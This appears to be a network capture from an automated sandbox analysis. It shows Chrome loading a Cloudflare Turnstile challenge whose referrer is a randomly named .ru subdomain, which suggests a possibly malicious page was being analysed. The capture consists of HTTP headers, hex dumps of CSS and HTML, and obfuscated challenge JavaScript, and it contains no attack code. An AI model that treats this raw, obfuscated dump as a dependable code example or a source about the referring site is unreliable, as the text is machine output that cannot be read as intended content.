                                                2024-05-30 10:20:44 UTC1369INData Raw: 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 73 74 72 6f 6b 65 2d 77 69 64 74 68 22 2c 22 33 22 29 2c 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 73 74 72 6f 6b 65 22 2c 22 23 66 66 66 22 29 2c 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 66 69 6c 6c 22 2c 22 6e 6f 6e 65 22 29 2c 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 78 31 22 2c 22 36 22 29 2c 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 78 32 22 2c 22 31 38 22 29 2c 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 79 31 22 2c 22 31 38 22 29 2c 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 79 32 22 2c 22 35 22 29 2c 6e 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 74 29 3b 76 61 72 20 66 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 4e 53 28 22 68 74 74 70 3a 2f 2f 77
                                                Data Ascii: .setAttribute("stroke-width","3"),t.setAttribute("stroke","#fff"),t.setAttribute("fill","none"),t.setAttribute("x1","6"),t.setAttribute("x2","18"),t.setAttribute("y1","18"),t.setAttribute("y2","5"),n.appendChild(t);var f=document.createElementNS("http://w


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                9192.168.2.449750104.17.2.1844434956C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-05-30 10:20:45 UTC790OUTGET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/fetwl/0x4AAAAAAAbKSXjZm5zNeGX0/auto/normal HTTP/1.1
                                                Host: challenges.cloudflare.com
                                                Connection: keep-alive
                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                sec-ch-ua-mobile: ?0
                                                sec-ch-ua-platform: "Windows"
                                                Upgrade-Insecure-Requests: 1
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Sec-Fetch-Site: cross-site
                                                Sec-Fetch-Mode: navigate
                                                Sec-Fetch-Dest: iframe
                                                Referer: https://f8gxf.oritelos.ru/
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                2024-05-30 10:20:45 UTC1362INHTTP/1.1 200 OK
                                                Date: Thu, 30 May 2024 10:20:45 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Content-Length: 79406
                                                Connection: close
                                                cross-origin-opener-policy: same-origin
                                                cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                origin-agent-cluster: ?1
                                                permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                document-policy: js-profiling
                                                referrer-policy: same-origin
                                                cross-origin-embedder-policy: require-corp
                                                content-security-policy: frame-src https://challenges.cloudflare.com/; base-uri 'self'
                                                accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                critical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                cross-origin-resource-policy: cross-origin
                                                2024-05-30 10:20:45 UTC82INData Raw: 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 38 62 64 66 65 35 31 32 65 35 64 34 33 30 31 2d 45 57 52 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                                                Data Ascii: Server: cloudflareCF-RAY: 88bdfe512e5d4301-EWRalt-svc: h3=":443"; ma=86400
                                                2024-05-30 10:20:45 UTC1294INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0a
                                                Data Ascii: <!DOCTYPE HTML><html lang="en-US"><head> <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1"> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
                                                2024-05-30 10:20:45 UTC1369INData Raw: 30 30 25 3b 0a 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 0a 7d 0a 0a 62 6f 64 79 20 7b 0a 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 0a 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 37 70 78 3b 0a 20 20 63 6f 6c 6f 72 3a 20 23 31 64 31 66 32 30 3b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 73 79 73 74 65 6d 2d 75 69 2c 20 62 6c 69 6e 6b 6d 61 63 73 79 73 74 65 6d 66 6f 6e 74 2c 20
                                                Data Ascii: 00%; height: 100%; overflow: hidden;}body { margin: 0; background-color: #fff; padding: 0; width: 100%; height: 100%; overflow: hidden; line-height: 17px; color: #1d1f20; font-family: -apple-system, system-ui, blinkmacsystemfont,
                                                2024-05-30 10:20:45 UTC1369INData Raw: 6d 69 74 65 72 6c 69 6d 69 74 3a 20 31 30 3b 0a 7d 0a 0a 23 73 75 63 63 65 73 73 2d 69 63 6f 6e 20 7b 0a 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 38 70 78 3b 0a 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 3b 0a 20 20 62 6f 78 2d 73 68 61 64 6f 77 3a 20 69 6e 73 65 74 20 30 20 30 20 30 20 23 30 33 38 31 32 37 3b 0a 20 20 77 69 64 74 68 3a 20 33 30 70 78 3b 0a 20 20 68 65 69 67 68 74 3a 20 33 30 70 78 3b 0a 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 63 61 6c 65 2d 75 70 2d 63 65 6e 74 65 72 20 30 2e 36 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 30 2e 35 35 2c 20 30 2e 30 38 35 2c 20 30 2e 36 38 2c 20 30 2e 35 33 29 20 62 6f 74 68 3b 0a 20 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 20
                                                Data Ascii: miterlimit: 10;}#success-icon { display: flex; margin-right: 8px; border-radius: 50%; box-shadow: inset 0 0 0 #038127; width: 30px; height: 30px; animation: scale-up-center 0.6s cubic-bezier(0.55, 0.085, 0.68, 0.53) both; stroke-width:
                                                2024-05-30 10:20:45 UTC1369INData Raw: 61 3a 66 6f 63 75 73 2c 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 68 6f 76 65 72 2c 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 61 63 74 69 76 65 2c 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 66 6f 63 75 73 20 7b 0a 20 20 63 6f 6c 6f 72 3a 20 23 39 34 39 34 39 34 3b 0a 7d 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 63 62 2d 6c 62 20 2e 63 62 2d 69 20 7b 0a 20 20 62 6f 72 64 65 72 3a 20 32 70 78 20 73 6f 6c 69 64 20 23 64 61 64 61 64 61 3b 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 32 32 3b 0a 7d 0a 2e 74 68 65 6d 65 2d 64 61 72 6b
                                                Data Ascii: a:focus,.theme-dark #challenge-error-text a:hover,.theme-dark #challenge-error-text a:active,.theme-dark #challenge-error-text a:focus { color: #949494;}.theme-dark .cb-lb .cb-i { border: 2px solid #dadada; background-color: #222;}.theme-dark
                                                2024-05-30 10:20:45 UTC1369INData Raw: 20 20 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 36 36 36 3b 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 32 32 3b 0a 7d 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 71 72 20 7b 0a 20 20 66 69 6c 6c 3a 20 72 67 62 28 32 34 33 2c 20 31 32 38 2c 20 33 32 29 3b 0a 7d 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 6c 6f 67 6f 2d 74 65 78 74 20 7b 0a 20 20 66 69 6c 6c 3a 20 23 66 66 66 3b 0a 7d 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 69 6e 6b 2c 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 20 7b 0a 20 20 63 6f 6c 6f 72 3a 20 23 62 62 62 3b 0a 7d 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 69 6e 6b 3a 76 69 73 69 74 65 64 2c
                                                Data Ascii: border-color: #666; background-color: #222;}.theme-dark #qr { fill: rgb(243, 128, 32);}.theme-dark .logo-text { fill: #fff;}.theme-dark #fr-helper-link,.theme-dark #fr-helper-loop-link { color: #bbb;}.theme-dark #fr-helper-link:visited,
                                                2024-05-30 10:20:45 UTC1369INData Raw: 63 6f 6c 6f 72 3a 20 23 66 61 66 61 66 61 3b 0a 7d 0a 0a 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 2c 0a 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 7b 0a 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 30 70 78 3b 0a 20 20 63 6f 6c 6f 72 3a 20 23 64 65 31 33 30 33 3b 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 39 70 78 3b 0a 7d 0a 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 2c 0a 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 20 7b 0a 20 20 63 6f 6c 6f 72 3a 20 23 31 64 31 66 32 30 3b 0a 7d 0a 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 76 69 73 69 74 65 64 2c 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76
                                                Data Ascii: color: #fafafa;}#challenge-overlay,#challenge-error-text { text-align: center; line-height: 10px; color: #de1303; font-size: 9px;}#challenge-overlay a,#challenge-error-text a { color: #1d1f20;}#challenge-overlay a:visited, #challenge-ov
                                                2024-05-30 10:20:45 UTC1369INData Raw: 74 3a 61 63 74 69 76 65 20 7e 20 73 70 61 6e 2e 63 62 2d 6c 62 2d 74 20 7b 0a 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 75 6e 64 65 72 6c 69 6e 65 3b 0a 7d 0a 2e 63 62 2d 6c 62 20 69 6e 70 75 74 3a 66 6f 63 75 73 20 7e 20 2e 63 62 2d 69 20 7b 0a 20 20 62 6f 72 64 65 72 3a 20 32 70 78 20 73 6f 6c 69 64 20 23 63 34 34 64 30 65 3b 0a 7d 0a 2e 63 62 2d 6c 62 20 69 6e 70 75 74 3a 66 6f 63 75 73 20 7e 20 73 70 61 6e 2e 63 62 2d 6c 62 2d 74 20 7b 0a 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 75 6e 64 65 72 6c 69 6e 65 3b 0a 7d 0a 2e 63 62 2d 6c 62 20 69 6e 70 75 74 3a 63 68 65 63 6b 65 64 20 7e 20 2e 63 62 2d 69 20 7b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 28 30 64 65 67 29 20 73 63 61 6c 65 28 31 29 3b 0a 20 20
                                                Data Ascii: t:active ~ span.cb-lb-t { text-decoration: underline;}.cb-lb input:focus ~ .cb-i { border: 2px solid #c44d0e;}.cb-lb input:focus ~ span.cb-lb-t { text-decoration: underline;}.cb-lb input:checked ~ .cb-i { transform: rotate(0deg) scale(1);
                                                2024-05-30 10:20:45 UTC1369INData Raw: 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 70 78 3b 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 30 3b 0a 7d 0a 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 20 7b 0a 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 20 20 66 6c 65 78 2d 66 6c 6f 77 3a 20 72 6f 77 2d 72 65 76 65 72 73 65 20 77 72 61 70 3b 0a 20 20 70 6c 61 63 65 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 20 66 6c 65 78 2d 73 74 61 72 74 3b 0a 20 20 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0a 20 20 6d 61 72 67 69 6e 3a 20 35 70 78 20 31 36 70 78 20 30 3b 0a 20 20 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 30 3b 0a 20 20 74 65 78 74 2d 61 6c 69 67
                                                Data Ascii: .size-compact .cb-container { margin-top: 3px; margin-left: 0;}.size-compact #branding { display: flex; flex-flow: row-reverse wrap; place-content: center flex-start; align-items: center; margin: 5px 16px 0; padding-right: 0; text-alig
                                                2024-05-30 10:20:45 UTC1369INData Raw: 74 3a 20 30 3b 0a 20 20 77 69 64 74 68 3a 20 39 30 70 78 3b 0a 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 72 74 6c 20 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 20 7b 0a 20 20 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 30 3b 0a 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 30 3b 0a 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 72 74 6c 20 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 74 65 72 6d 73 20 7b 0a 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 72 74 6c 20 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 63 66 2d 73 74 61 67 65 20 7b 0a 20 20 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 34 38 70 78 3b 0a 7d 0a 2e 72 74 6c 20 2e 73 69
                                                Data Ascii: t: 0; width: 90px; text-align: center;}.rtl .size-compact #branding { padding-right: 0; padding-left: 0; text-align: center;}.rtl .size-compact #terms { text-align: center;}.rtl .size-compact #cf-stage { padding-right: 48px;}.rtl .si


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                10192.168.2.449751104.17.2.1844434956C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-05-30 10:20:46 UTC710OUTGET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=88bdfe512e5d4301 HTTP/1.1
                                                Host: challenges.cloudflare.com
                                                Connection: keep-alive
                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                sec-ch-ua-mobile: ?0
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                sec-ch-ua-platform: "Windows"
                                                Accept: */*
                                                Sec-Fetch-Site: same-origin
                                                Sec-Fetch-Mode: no-cors
                                                Sec-Fetch-Dest: script
                                                Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/fetwl/0x4AAAAAAAbKSXjZm5zNeGX0/auto/normal
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                2024-05-30 10:20:46 UTC331INHTTP/1.1 200 OK
                                                Date: Thu, 30 May 2024 10:20:46 GMT
                                                Content-Type: application/javascript; charset=UTF-8
                                                Content-Length: 445432
                                                Connection: close
                                                cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                Server: cloudflare
                                                CF-RAY: 88bdfe552f617285-EWR
                                                alt-svc: h3=":443"; ma=86400
                                                2024-05-30 10:20:46 UTC1038INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 7e 66 75 6e 63 74 69 6f 6e 28 69 7a 2c 66 46 2c 66 47 2c 66 4e 2c 66 55 2c 66 57 2c 66 58 2c 66 59 2c 66 5a 2c 67 30 2c 67 31 2c 67 32 2c 67 33 2c 67 34 2c 67 35 2c 67 36 2c 67 37 2c 67 38 2c 67 39 2c 67 61 2c 67 62 2c 67 63 2c 67 64 2c 67 65 2c 67 66 2c 67 67 2c 67 68 2c 67 69 2c 67 6a 2c 67 6b 2c 67 6c 2c 67 6d 2c 67 6e 2c 67 6f 2c 67 70 2c 67 71 2c 67 72 2c 67 73 2c 67 74 2c 67 75 2c 67 76 2c 67 77 2c 67 78 2c 67 79 2c 67 7a 2c 67 41 2c 67 42 2c 67 43 2c 67 44 2c 67 45 2c 67 46 2c 67 47 2c 67 48 2c 67 49 2c 67 4a 2c 67 4b 2c 67 4c 2c 67 4d 2c 67 4e 2c 67 4f 2c 67 50 2c 67 51 2c 67 52 2c 67 54 2c 68 35 2c 68 69 2c 68 6e 2c 68 6f 2c 68 70 2c 68 42 2c 68 4d 2c 68 51 2c
                                                Data Ascii: window._cf_chl_opt.uaO=false;~function(iz,fF,fG,fN,fU,fW,fX,fY,fZ,g0,g1,g2,g3,g4,g5,g6,g7,g8,g9,ga,gb,gc,gd,ge,gf,gg,gh,gi,gj,gk,gl,gm,gn,go,gp,gq,gr,gs,gt,gu,gv,gw,gx,gy,gz,gA,gB,gC,gD,gE,gF,gG,gH,gI,gJ,gK,gL,gM,gN,gO,gP,gQ,gR,gT,h5,hi,hn,ho,hp,hB,hM,hQ,
                                                2024-05-30 10:20:46 UTC1369INData Raw: 5b 5d 2c 66 46 5b 6a 64 28 31 30 32 38 29 5d 5b 6a 64 28 32 30 33 36 29 5d 28 7b 27 73 6f 75 72 63 65 27 3a 65 5b 6a 64 28 36 33 37 29 5d 2c 27 77 69 64 67 65 74 49 64 27 3a 66 46 5b 6a 64 28 33 31 38 33 29 5d 5b 6a 64 28 32 38 31 31 29 5d 2c 27 65 76 65 6e 74 27 3a 65 5b 6a 64 28 36 31 30 29 5d 2c 27 63 66 43 68 6c 4f 75 74 27 3a 66 46 5b 6a 64 28 33 31 38 33 29 5d 5b 6a 64 28 33 32 31 37 29 5d 2c 27 63 66 43 68 6c 4f 75 74 53 27 3a 66 46 5b 6a 64 28 33 31 38 33 29 5d 5b 6a 64 28 31 35 38 36 29 5d 2c 27 63 6f 64 65 27 3a 65 5b 6a 64 28 35 33 31 29 5d 2c 27 72 63 56 27 3a 66 46 5b 6a 64 28 33 31 38 33 29 5d 5b 6a 64 28 32 30 34 33 29 5d 7d 2c 27 2a 27 29 29 7d 2c 67 29 7d 2c 66 46 5b 69 7a 28 38 30 32 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 66 2c 67 2c 68 2c
                                                Data Ascii: [],fF[jd(1028)][jd(2036)]({'source':e[jd(637)],'widgetId':fF[jd(3183)][jd(2811)],'event':e[jd(610)],'cfChlOut':fF[jd(3183)][jd(3217)],'cfChlOutS':fF[jd(3183)][jd(1586)],'code':e[jd(531)],'rcV':fF[jd(3183)][jd(2043)]},'*'))},g)},fF[iz(802)]=function(f,g,h,
                                                2024-05-30 10:20:46 UTC1369INData Raw: 2b 66 46 5b 6a 65 28 33 31 38 33 29 5d 5b 6a 65 28 32 36 31 35 29 5d 2c 27 3d 27 29 2c 78 29 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 31 32 27 3a 43 5b 6a 65 28 33 39 37 29 5d 3d 32 35 30 30 3b 63 6f 6e 74 69 6e 75 65 7d 62 72 65 61 6b 7d 7d 63 61 74 63 68 28 45 29 7b 7d 7d 2c 66 46 5b 69 7a 28 31 36 36 38 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 64 2c 65 2c 66 2c 67 2c 68 2c 6a 66 2c 69 2c 6a 2c 6b 2c 6c 2c 6d 29 7b 28 6a 66 3d 69 7a 2c 69 3d 7b 7d 2c 69 5b 6a 66 28 31 30 32 39 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 6e 2c 6f 29 7b 72 65 74 75 72 6e 20 6e 2b 6f 7d 2c 69 5b 6a 66 28 32 30 31 30 29 5d 3d 6a 66 28 32 37 39 33 29 2c 69 5b 6a 66 28 33 32 30 37 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 6e 2c 6f 29 7b 72 65 74 75 72 6e 20 6e 3d 3d 3d 6f 7d 2c 69 5b 6a
                                                Data Ascii: +fF[je(3183)][je(2615)],'='),x));continue;case'12':C[je(397)]=2500;continue}break}}catch(E){}},fF[iz(1668)]=function(d,e,f,g,h,jf,i,j,k,l,m){(jf=iz,i={},i[jf(1029)]=function(n,o){return n+o},i[jf(2010)]=jf(2793),i[jf(3207)]=function(n,o){return n===o},i[j
                                                2024-05-30 10:20:46 UTC1369INData Raw: 3a 61 39 5b 6a 6c 28 33 31 38 33 29 5d 5b 6a 6c 28 31 33 30 33 29 5d 2c 27 4c 58 61 6c 32 27 3a 61 61 5b 6a 6c 28 32 31 39 32 29 5d 2c 27 43 63 59 64 38 27 3a 61 62 5b 6a 6c 28 33 31 38 33 29 5d 5b 6a 6c 28 36 36 36 29 5d 2c 27 43 46 6d 6c 72 34 27 3a 61 63 5b 6a 6c 28 33 31 38 33 29 5d 5b 6a 6c 28 32 36 38 37 29 5d 2c 27 58 75 44 51 62 32 27 3a 30 2c 27 44 67 4c 57 36 27 3a 61 64 5b 6a 6c 28 33 31 38 33 29 5d 5b 6a 6c 28 31 37 34 30 29 5d 2c 27 62 56 6b 46 38 27 3a 61 65 5b 6a 6c 28 33 31 38 33 29 5d 5b 6a 6c 28 31 35 34 34 29 5d 2c 27 52 79 5a 78 34 27 3a 61 66 5b 6a 6c 28 33 31 38 33 29 5d 5b 6a 6c 28 33 36 39 29 5d 2c 27 6b 4b 58 45 36 27 3a 61 67 5b 6a 6c 28 33 31 38 33 29 5d 5b 6a 6c 28 32 31 37 35 29 5d 2c 27 6f 6f 72 6d 5a 37 27 3a 61 68 5b 6a 6c
                                                Data Ascii: :a9[jl(3183)][jl(1303)],'LXal2':aa[jl(2192)],'CcYd8':ab[jl(3183)][jl(666)],'CFmlr4':ac[jl(3183)][jl(2687)],'XuDQb2':0,'DgLW6':ad[jl(3183)][jl(1740)],'bVkF8':ae[jl(3183)][jl(1544)],'RyZx4':af[jl(3183)][jl(369)],'kKXE6':ag[jl(3183)][jl(2175)],'oormZ7':ah[jl
                                                2024-05-30 10:20:46 UTC1369INData Raw: 29 5d 3d 69 7a 28 31 37 34 33 29 2c 66 57 5b 69 7a 28 31 32 38 38 29 5d 3d 69 7a 28 32 33 31 36 29 2c 66 57 5b 69 7a 28 32 30 34 39 29 5d 3d 69 7a 28 31 34 38 36 29 2c 66 57 5b 69 7a 28 31 32 35 35 29 5d 3d 69 7a 28 32 30 38 34 29 2c 66 57 5b 69 7a 28 32 31 33 38 29 5d 3d 69 7a 28 32 31 39 33 29 2c 66 57 5b 69 7a 28 32 33 32 32 29 5d 3d 69 7a 28 31 38 34 39 29 2c 66 57 5b 69 7a 28 31 36 36 32 29 5d 3d 69 7a 28 32 32 33 36 29 2c 66 57 5b 69 7a 28 32 35 38 39 29 5d 3d 69 7a 28 31 37 38 30 29 2c 66 57 5b 69 7a 28 32 30 36 37 29 5d 3d 69 7a 28 32 34 39 33 29 2c 66 57 5b 69 7a 28 32 34 35 39 29 5d 3d 69 7a 28 33 32 30 32 29 2c 66 57 5b 69 7a 28 31 30 39 35 29 5d 3d 69 7a 28 32 30 38 30 29 2c 66 57 5b 69 7a 28 31 30 37 34 29 5d 3d 69 7a 28 32 32 36 38 29 2c 66
                                                Data Ascii: )]=iz(1743),fW[iz(1288)]=iz(2316),fW[iz(2049)]=iz(1486),fW[iz(1255)]=iz(2084),fW[iz(2138)]=iz(2193),fW[iz(2322)]=iz(1849),fW[iz(1662)]=iz(2236),fW[iz(2589)]=iz(1780),fW[iz(2067)]=iz(2493),fW[iz(2459)]=iz(3202),fW[iz(1095)]=iz(2080),fW[iz(1074)]=iz(2268),f
                                                2024-05-30 10:20:46 UTC1369INData Raw: 5b 69 7a 28 31 34 38 33 29 5d 3d 69 7a 28 32 39 35 33 29 2c 66 59 5b 69 7a 28 32 39 30 36 29 5d 3d 69 7a 28 31 34 33 33 29 2c 66 59 5b 69 7a 28 32 34 35 31 29 5d 3d 69 7a 28 33 31 30 33 29 2c 66 59 5b 69 7a 28 33 35 38 29 5d 3d 69 7a 28 35 39 36 29 2c 66 59 5b 69 7a 28 33 32 31 29 5d 3d 69 7a 28 31 38 32 36 29 2c 66 59 5b 69 7a 28 35 35 30 29 5d 3d 69 7a 28 33 32 37 36 29 2c 66 59 5b 69 7a 28 37 30 38 29 5d 3d 69 7a 28 32 38 33 36 29 2c 66 59 5b 69 7a 28 31 37 38 33 29 5d 3d 69 7a 28 32 35 34 34 29 2c 66 59 5b 69 7a 28 31 38 31 33 29 5d 3d 69 7a 28 32 36 36 30 29 2c 66 59 5b 69 7a 28 31 31 30 35 29 5d 3d 69 7a 28 31 30 36 35 29 2c 66 59 5b 69 7a 28 32 39 36 34 29 5d 3d 69 7a 28 31 33 36 30 29 2c 66 59 5b 69 7a 28 31 38 34 31 29 5d 3d 69 7a 28 32 34 30 31
                                                Data Ascii: [iz(1483)]=iz(2953),fY[iz(2906)]=iz(1433),fY[iz(2451)]=iz(3103),fY[iz(358)]=iz(596),fY[iz(321)]=iz(1826),fY[iz(550)]=iz(3276),fY[iz(708)]=iz(2836),fY[iz(1783)]=iz(2544),fY[iz(1813)]=iz(2660),fY[iz(1105)]=iz(1065),fY[iz(2964)]=iz(1360),fY[iz(1841)]=iz(2401
